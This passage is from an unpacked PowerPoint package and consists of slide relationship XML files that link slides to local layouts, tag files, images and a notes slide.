Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag34.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag33.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag32.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag31.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide100.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout831.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag390.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag389.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag388.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag387.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide101.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout841.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag394.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag393.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag392.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag391.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide102.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout851.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag398.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag397.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag396.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag395.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide103.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout861.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag402.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag401.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag400.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag399.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide104.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout871.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag406.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag405.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag404.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag403.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide105.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout881.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag410.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag409.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag408.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag407.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide106.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout891.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag411.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide107.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag415.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag414.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout901.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag413.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag412.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide108.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout911.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide109.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout921.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag38.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag36.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide110.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout931.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag419.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag418.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag417.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag416.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide111.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag428.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag427.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag426.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag425.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag424.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag423.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag422.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag421.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout941.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag432.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag431.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag430.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag429.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag420.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide112.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout952.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag435.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag434.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag433.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide113.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout962.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag438.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag437.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag436.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide114.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout971.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag442.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag441.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag440.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag439.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide115.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout981.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag447.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag446.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag445.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag444.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag443.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide116.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout991.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag451.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag450.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag449.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag448.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide117.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1001.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag455.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag454.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag453.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag452.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide118.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1011.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag459.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag458.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag457.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag456.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide119.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1021.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag463.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag462.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag461.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag460.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag42.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag41.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag40.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag39.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide120.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1031.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag467.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag466.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag465.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag464.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide121.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1041.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag468.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide122.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
